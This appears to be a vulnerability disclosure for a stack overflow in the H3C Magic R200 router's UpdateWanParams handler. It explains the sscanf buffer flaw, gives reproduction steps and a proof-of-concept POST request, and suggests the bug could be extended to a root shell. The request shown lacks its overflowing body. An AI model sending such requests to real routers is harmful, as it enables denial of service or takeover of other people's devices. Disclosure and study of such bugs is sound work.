# H3C Magic R200 was discovered stack overflow via the UpdateWanParams interface at /goform/aspForm
###### tags: `H3C` `Magic R200`
author:Wolin Zhuang, Yifeng Li;
## Vulnerability Description
H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateWanParams interface at /goform/aspForm.
## Vulnerability Details
In function UpdateWanParams, string Var is passed in by parameter 'param' . Local varible v58 is 64 bytes long. When the length of Var is less than 512 and larger than 64, in line 15, the content of Var is formatted into v58 by sscanf function in the form of `%s`, which leads to a stack overflow vulnerbility.
## Recurring vulnerabilities and POC
In order to reproduce the vulnerability, the following steps can be followed:
1. Upgrade router Magic_R200 to newest version(we have a physical machine)
2. Login to 192.168.124.1 as admin
3. Attack with the following POC
POST /goform/aspForm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept-Encoding: gzip, deflate
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG=; cur_page=maintain_logs.asp?refreshFlag=Tue%20Mar%2014%202023%2016:05:37%20GMT+0800%20(%D0%C2%BC%D3%C6%C2%B1%EA%D7%BC%CA%B1%BC%E4)
By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service.
We can see process webs is crashed and restarted.
And you can write your own exp to get the root shell.